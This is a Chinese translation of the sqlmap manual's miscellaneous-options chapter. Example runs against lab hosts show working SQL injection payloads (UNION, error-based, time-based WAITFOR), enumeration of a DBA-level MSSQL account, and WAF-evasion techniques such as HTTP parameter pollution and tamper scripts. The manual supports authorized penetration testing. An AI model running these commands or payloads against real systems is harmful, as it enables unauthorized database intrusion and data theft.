杂项

译自:Miscellaneous

使用短助记符

选项:-z

输入所有想要使用的选项和开关是很乏味的事情,特别是对于那些常用的选项和开关(例如:--batch --random-agent --ignore-proxy --technique=BEU)。有一个更简短的方法来处理这个问题。在 sqlmap 中,它被称为“助记符”。

使用选项 -z,每个选项和开关可以用较短的助记符形式,并用逗号(,)分隔,其中助记符代表原始名称的第一个任意选择的部分。选项和开关没有严格映射到他们各自精简后的部分。唯一需要满足的条件是没有其他选项和开关使用了与之相同的前缀。

例如:

  1. $ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "ww\
  2. w.target.com/vuln.php?id=1"

可以用短助记符形式(多种方法之一)写成:

  1. $ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=\
  2. 1"

另一个例子:

  1. $ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testd\
  2. b -T users -u "www.target.com/vuln.php?id=1"

可以用短助记符形式写成:

  1. $ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.\
  2. com/vuln.php?id=1"

警告成功的 SQL 注入检测

选项:--alert

为问题设置答案

选项:--answers

如果用户想要自动回答问题,即使使用了 --batch 选项,也可以通过在等号后提供一部分的问题和对应的回答来做到这一点。另外,不同问题的答案可以用分隔符 , 分割。

针对 MySQL 目标的示例:

  1. $ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--te\
  2. chnique=E --answers="extending=N" --batch
  3. [...]
  4. [xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
  5. heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  6. [xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provide
  7. d level (1) and risk (1)? [Y/n] N
  8. [...]

发现 SQL 注入时发出“哔”声

开关:--beep

如果用户使用了开关 --beep,那么在发现 SQL 注入时,sqlmap 会立即发出“哔”的警告声。当测试的目标 URLs 是大批量列表(选项 -m)时特别有用。

清除 DBMS(Database Management System,数据库管理系统)中特定的 sqlmap UDF(s) 和表

开关:--cleanup

建议在完成底层操作系统或文件系统的接管后,清理后端 DBMS 中的 sqlmap 临时表(如 sqlmapoutput)和用户定义函数。使用 --cleanup 开关将尽可能地清理 DBMS 和文件系统。

检查依赖关系

开关:--dependencies

在某些特殊情况下,sqlmap 需要独立安装额外的第三方库(例如:选项 -d,开关 --os-pwn 之于 icmpsh 隧道,选项 --auth-type 之于 NTLM 类型的 HTTP 认证等。),只在这种特殊情况下会警告用户。不过,如果你想独立检查所有这些额外的第三方库依赖关系,可以使用开关 --dependencies

  1. $ python sqlmap.py --dependencies
  2. [...]
  3. [xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in
  4. order to directly connect to the DBMS Firebird. Download from http://kinterbasd
  5. b.sourceforge.net/
  6. [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
  7. er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo
  8. rge.net/
  9. [xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord
  10. er to directly connect to the DBMS MySQL. Download from https://github.com/peteh
  11. unt/PyMySQL/
  12. [xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o
  13. rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour
  14. ceforge.net/
  15. [xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or
  16. der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p
  17. sycopg/
  18. [xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde
  19. r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/
  20. p/ibm-db/
  21. [xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa
  22. rty library in order to directly connect to the DBMS HSQLDB. Download from https
  23. ://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
  24. [xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde
  25. r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.
  26. googlecode.com/
  27. [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
  28. er to directly connect to the DBMS Microsoft SQL Server. Download from http://py
  29. mssql.sourceforge.net/
  30. [xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl
  31. an to attack a web application behind NTLM authentication. Download from http://
  32. code.google.com/p/python-ntlm/
  33. [xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y
  34. ou plan to attack a web application using WebSocket. Download from https://pypi.
  35. python.org/pypi/websocket-client/

禁用控制台输出着色

开关:--disable-coloring

默认情况下,sqlmap 输出到控制台时使用着色。你可以使用此开关禁用控制台输出着色,以避免不期望的效果(例如:控制台中未解析的 ANSI 代码着色效果,像 \x01\x1b[0;32m\x02[INFO])。

使用特定页码的 Google dork 结果

选项:--gpage

默认情况下,使用选项 -g 时,sqlmap 会使用 Google 搜索得到的前 100 个 URLs 进行进一步的 SQL 注入测试。结合此选项,你可以使用它(--gpage)指定除第一页以外的页面以检索目标 URLs。

使用 HTTP 参数污染

开关:--hpp

HTTP 参数污染(HPP)是一种绕过 WAF/IPS 防护机制(这里 有相关介绍)的方法,对 ASP/IIS 和 ASP.NET/IIS 平台尤其有效。如果你怀疑目标使用了这种防护机制,可以尝试使用此开关以绕过它。

针对 WAF/IPS 防护进行彻底的测试

开关:--identify-waf

sqlmap 可以尝试识别后端 WAF/IPS 防护(如果有),以便用户可以执行恰当的步骤(例如:通过选项 --tamper 使用篡改脚本)。目前,大约支持 30 种不同的产品(例如:Airlock,Barracuda WAF 等),可以在 waf 目录下找到它们对应的 WAF 脚本。

针对受 ModSecurity WAF 防护的 MySQL 目标示例:

  1. $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --i\
  2. dentify-waf -v 3
  3. [...]
  4. [xx:xx:23] [INFO] testing connection to the target URL
  5. [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
  6. [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS protection
  7. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'USP Secure Entry Server (Un
  8. ited Security Providers)'
  9. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'BinarySEC Web Application F
  10. irewall (BinarySEC)'
  11. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetContinuum Web Applicatio
  12. n Firewall (NetContinuum/Barracuda Networks)'
  13. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
  14. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Cisco ACE XML Gateway (Cisc
  15. o Systems)'
  16. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'TrafficShield (F5 Networks)
  17. '
  18. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Teros/Citrix Application Fi
  19. rewall Enterprise (Teros/Citrix Systems)'
  20. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KONA Security Solutions (Ak
  21. amai Technologies)'
  22. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Incapsula Web Application F
  23. irewall (Incapsula/Imperva)'
  24. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
  25. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Barracuda Web Application F
  26. irewall (Barracuda Networks)'
  27. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'webApp.secure (webScurity)'
  28. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Proventia Web Application S
  29. ecurity (IBM)'
  30. [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
  31. [xx:xx:23] [DEBUG] page not found (404)
  32. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KS-WAF (Knownsec)'
  33. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetScaler (Citrix Systems)'
  34. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Jiasule Web Application Fir
  35. ewall (Jiasule)'
  36. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'WebKnight Application Firew
  37. all (AQTRONIX)'
  38. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'AppWall (Radware)'
  39. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'ModSecurity: Open Source We
  40. b Application Firewall (Trustwave)'
  41. [xx:xx:23] [CRITICAL] WAF/IPS identified 'ModSecurity: Open Source Web Appli
  42. cation Firewall (Trustwave)'. Please consider usage of tamper scripts (option '-
  43. -tamper')
  44. [...]

跳过启发式检测 WAF/IPS 防护

开关:--skip-waf

默认情况下,sqlmap 自动在一个启动请求中发送一个虚假的参数值,其中包含一个有意“可疑”的 SQL 注入 payload(例如:...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1)。如果目标响应与原始请求响应不同,那么它很可能存在防护机制。如果有任何问题,用户可以使用开关 --skip-waf 来禁用此机制。

伪装智能手机

开关:--mobile

有时 Web 服务器向手机提供的是不同于电脑的接口。在这种情况下,你可以强制使用预定义好的智能手机 HTTP User-Agent 头部值。使用此开关,sqlmap 将询问你选择一种流行的智能手机,它将在当前运行中进行伪装。

运行示例:

  1. $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
  2. [...]
  3. which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
  4. [1] Apple iPhone 4s (default)
  5. [2] BlackBerry 9900
  6. [3] Google Nexus 7
  7. [4] HP iPAQ 6365
  8. [5] HTC Sensation
  9. [6] Nokia N97
  10. [7] Samsung Galaxy S
  11. > 1
  12. [...]

离线工作模式(仅使用会话数据)

开关:--offline

使用开关 --offline,sqlmap 在数据枚举中将仅使用上一个会话的数据。这基本上意味着在这样的运行过程中是零连接尝试的。

安全地删除 data 目录中所有内容

开关:--purge

While purging, all files from (sub)directories in data folder will be overwritten with random data, truncated, renamed to random names, (sub)directories will be renamed to random names too, and finally the whole directory tree will be deleted.

如果用户决定安全删除 sqlmap data 目录(例如 $HOME/.sqlmap)中的所有内容,包括之前 sqlmap 运行过的所有目标详细信息,可以使用开关 --purge。在清除时,data 目录中的(子)目录中的所有文件将被随机数据覆盖、截断和被重命名为随意名,(子)目录也将被重命名为随意名,最后整个目录树将被删除。

运行示例:

  1. $ python sqlmap.py --purge -v 3
  2. [...]
  3. [xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap'...
  4. [xx:xx:55] [DEBUG] changing file attributes
  5. [xx:xx:55] [DEBUG] writing random data to files
  6. [xx:xx:55] [DEBUG] truncating files
  7. [xx:xx:55] [DEBUG] renaming filenames to random values
  8. [xx:xx:55] [DEBUG] renaming directory names to random values
  9. [xx:xx:55] [DEBUG] deleting the whole directory tree
  10. [...]

只有在使用启发式检测时才进行彻底的测试

开关:--smart

某些情况下,用户拥有大量潜在目标 URL(例如:使用选项 -m)列表,同时他想要尽快找到易受攻击的目标。如果使用了开关 --smart,则只有能引发 DBMS 错误的参数会在进一步的扫描中被使用。否则会被跳过。

针对 MySQL 目标的示例:

  1. $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&use\
  2. r=foo&id=1" --batch --smart
  3. [...]
  4. [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
  5. [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
  6. [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
  7. [xx:xx:14] [INFO] skipping GET parameter 'ca'
  8. [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
  9. [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
  10. [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' migh
  11. t not be injectable
  12. [xx:xx:14] [INFO] skipping GET parameter 'user'
  13. [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
  14. [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
  15. [xx:xx:14] [INFO] GET parameter 'id' is dynamic
  16. [xx:xx:14] [WARNING] reflective value(s) found and filtering out
  17. [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  18. [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
  19. heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  20. do you want to include all tests for 'MySQL' extending provided level (1) and ri
  21. sk (1)? [Y/n] Y
  22. [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  23. [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
  24. NG clause' injectable [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  25. '
  26. [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
  27. HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries'
  28. [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  29. [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  30. [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  31. [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in jectable
  32. [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  33. [xx:xx:24] [INFO] automatically extending ranges for UNION query injection techn
  34. ique tests as there is at least one other potential injection technique found
  35. [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending t
  36. he range for current UNION query injection technique test
  37. [xx:xx:24] [INFO] target URL appears to have 3 columns in query
  38. [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
  39. mns' injectable
  40. [...]

根据 payloads 和/或标题选择(或跳过)测试

选项:--test-filter

如果你想根据 payloads 和/或标题过滤测试,可以使用此选项。例如,要测试所有包含 ROW 关键字的 payloads,可以使用 --test-filter=ROW

针对 MySQL 目标的示例:

  1. $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --b\
  2. atch --test-filter=ROW
  3. [...]
  4. [xx:xx:39] [INFO] GET parameter 'id' is dynamic
  5. [xx:xx:39] [WARNING] reflective value(s) found and filtering out
  6. [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  7. [xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
  8. [xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
  9. '
  10. [xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or
  11. HAVING clause' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
  12. )? [y/N] N
  13. sqlmap identified the following injection points with a total of 3 HTTP(s) reque
  14. sts:
  15. ---
  16. Place: GET
  17. Parameter: id
  18. Type: error-based
  19. Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
  20. Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELEC
  21. T (C
  22. ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FRO
  23. M (S
  24. ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
  25. ---
  26. [...]

选项:--test-skip=TEST

如果你想根据 payloads 和/或标题跳过测试,可以使用此选项。例如,想要跳过包含 BENCHMARK 关键字的 payloads,可以使用 --test-skip=BENCHMARK

交互式 sqlmap shell

开关:--sqlmap-shell

使用开关 --sqlmap-shell,用户可以看到交互式的 sqlmap shell,它具有所有以前运行的历史记录,包括使用过的选项和/或开关:

  1. $ python sqlmap.py --sqlmap-shell
  2. sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=\
  3. BEU --batch
  4. _
  5. ___ ___| |_____ ___ ___ {1.0-dev-2188502}
  6. |_ -| . | | | .'| . |
  7. |___|_ |_|_|_|_|__,| _|
  8. |_| |_| http://sqlmap.org
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
  10. consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
  11. sible for any misuse or damage caused by this program
  12. [*] starting at xx:xx:11
  13. [xx:xx:11] [INFO] testing connection to the target URL
  14. [xx:xx:12] [INFO] testing if the target URL is stable
  15. [xx:xx:13] [INFO] target URL is stable
  16. [xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
  17. [xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
  18. [xx:xx:13] [INFO] GET parameter 'artist' is dynamic
  19. [xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might
  20. be injectable (possible DBMS: 'MySQL')
  21. [xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
  22. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
  23. ecific for other DBMSes? [Y/n] Y
  24. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
  25. [xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  26. [xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
  27. [xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
  28. Y or GROUP BY clause'
  29. [xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
  30. or GROUP BY clause'
  31. [xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
  32. Y or GROUP BY clause (EXTRACTVALUE)'
  33. [xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
  34. or GROUP BY clause (EXTRACTVALUE)'
  35. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
  36. Y or GROUP BY clause (UPDATEXML)'
  37. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
  38. or GROUP BY clause (UPDATEXML)'
  39. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
  40. Y or GROUP BY clause (EXP)'
  41. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
  42. XP)'
  43. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
  44. Y or GROUP BY clause (BIGINT UNSIGNED)'
  45. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
  46. IGINT UNSIGNED)'
  47. [xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
  48. Y or GROUP BY clause'
  49. [xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
  50. [xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
  51. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
  52. VALUE)'
  53. [xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
  54. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
  55. VALUE)'
  56. [xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
  57. ML)'
  58. [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
  59. [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
  60. [xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
  61. [xx:xx:15] [INFO] automatically extending ranges for UNION query injection techn
  62. ique tests as there is at least one other (potential) technique found
  63. [xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
  64. [xx:xx:15] [INFO] target URL appears to have 3 columns in query
  65. [xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 2
  66. 0 columns' injectable
  67. GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if
  68. any)? [y/N] N
  69. sqlmap identified the following injection point(s) with a total of 39 HTTP(s) re
  70. quests:
  71. ---
  72. Parameter: artist (GET)
  73. Type: boolean-based blind
  74. Title: AND boolean-based blind - WHERE or HAVING clause
  75. Payload: artist=1 AND 5707=5707
  76. Type: UNION query
  77. Title: Generic UNION query (NULL) - 3 columns
  78. Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
  79. 26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
  80. NULL,NULL-- -
  81. ---
  82. [xx:xx:16] [INFO] testing MySQL
  83. [xx:xx:16] [INFO] confirming MySQL
  84. [xx:xx:16] [INFO] the back-end DBMS is MySQL
  85. web application technology: Nginx, PHP 5.3.10
  86. back-end DBMS: MySQL >= 5.0.0
  87. [xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
  88. p/output/testphp.vulnweb.com'
  89. sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
  90. _
  91. ___ ___| |_____ ___ ___ {1.0-dev-2188502}
  92. |_ -| . | | | .'| . |
  93. |___|_ |_|_|_|_|__,| _|
  94. |_| |_| http://sqlmap.org
  95. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
  96. consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
  97. sible for any misuse or damage caused by this program
  98. [*] starting at xx:xx:25
  99. [xx:xx:26] [INFO] resuming back-end DBMS 'mysql'
  100. [xx:xx:26] [INFO] testing connection to the target URL
  101. sqlmap resumed the following injection point(s) from stored session:
  102. ---
  103. Parameter: artist (GET)
  104. Type: boolean-based blind
  105. Title: AND boolean-based blind - WHERE or HAVING clause
  106. Payload: artist=1 AND 5707=5707
  107. Type: UNION query
  108. Title: Generic UNION query (NULL) - 3 columns
  109. Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
  110. 26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
  111. NULL,NULL-- -
  112. ---
  113. [xx:xx:26] [INFO] the back-end DBMS is MySQL
  114. [xx:xx:26] [INFO] fetching banner
  115. web application technology: Nginx, PHP 5.3.10
  116. back-end DBMS operating system: Linux Ubuntu
  117. back-end DBMS: MySQL 5
  118. banner: '5.1.73-0ubuntu0.10.04.1'
  119. [xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'
  120. sqlmap-shell> exit

适合初学者使用的向导界面

开关:--wizard

sqlmap 为初学者提供了一个向导界面,它使用包含尽可能少的问题的简单工作流。如果用户输入目标 URL 并使用了默认设置(例如:按 Enter),则应该在工作流结束时正确设置 sqlmap 运行环境。

针对 Microsoft SQL Server 目标的示例:

  1. $ python sqlmap.py --wizard
  2. sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
  3. http://sqlmap.org
  4. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
  5. consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
  6. sible for any misuse or damage caused by this program
  7. [*] starting at xx:xx:26
  8. Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_in
  9. t.asp?id=1
  10. POST data (--data) [Enter for None]:
  11. Injection difficulty (--level/--risk). Please choose:
  12. [1] Normal (default)
  13. [2] Medium
  14. [3] Hard
  15. > 1
  16. Enumeration (--banner/--current-user/etc). Please choose:
  17. [1] Basic (default)
  18. [2] Smart
  19. [3] All
  20. > 1
  21. sqlmap is running, please wait..
  22. heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
  23. erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  24. do you want to include all tests for 'Microsoft SQL Server' extending provided l
  25. evel (1) and risk (1)? [Y/n] Y
  26. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
  27. )? [y/N] N
  28. sqlmap identified the following injection points with a total of 25 HTTP(s) requ
  29. ests:
  30. ---
  31. Place: GET
  32. Parameter: id
  33. Type: boolean-based blind
  34. Title: AND boolean-based blind - WHERE or HAVING clause
  35. Payload: id=1 AND 2986=2986
  36. Type: error-based
  37. Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
  38. Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+C
  39. HAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58
  40. )+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))
  41. Type: UNION query
  42. Title: Generic UNION query (NULL) - 3 columns
  43. Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(1
  44. 00)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+
  45. CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--
  46. Type: stacked queries
  47. Title: Microsoft SQL Server/Sybase stacked queries
  48. Payload: id=1; WAITFOR DELAY '0:0:5'--
  49. Type: AND/OR time-based blind
  50. Title: Microsoft SQL Server/Sybase time-based blind
  51. Payload: id=1 WAITFOR DELAY '0:0:5'--
  52. Type: inline query
  53. Title: Microsoft SQL Server/Sybase inline queries
  54. Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT
  55. (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR
  56. (109)+CHAR(113)+CHAR(58))
  57. ---
  58. web server operating system: Windows XP
  59. web application technology: ASP, Microsoft IIS 5.1
  60. back-end DBMS operating system: Windows XP Service Pack 2
  61. back-end DBMS: Microsoft SQL Server 2005
  62. banner:
  63. ---
  64. Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
  65. Oct 14 2005 00:33:37
  66. Copyright (c) 1988-2005 Microsoft Corporation
  67. Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
  68. ---
  69. current user: 'sa'
  70. current database: 'testdb'
  71. current user is DBA: True
  72. [*] shutting down at xx:xx:52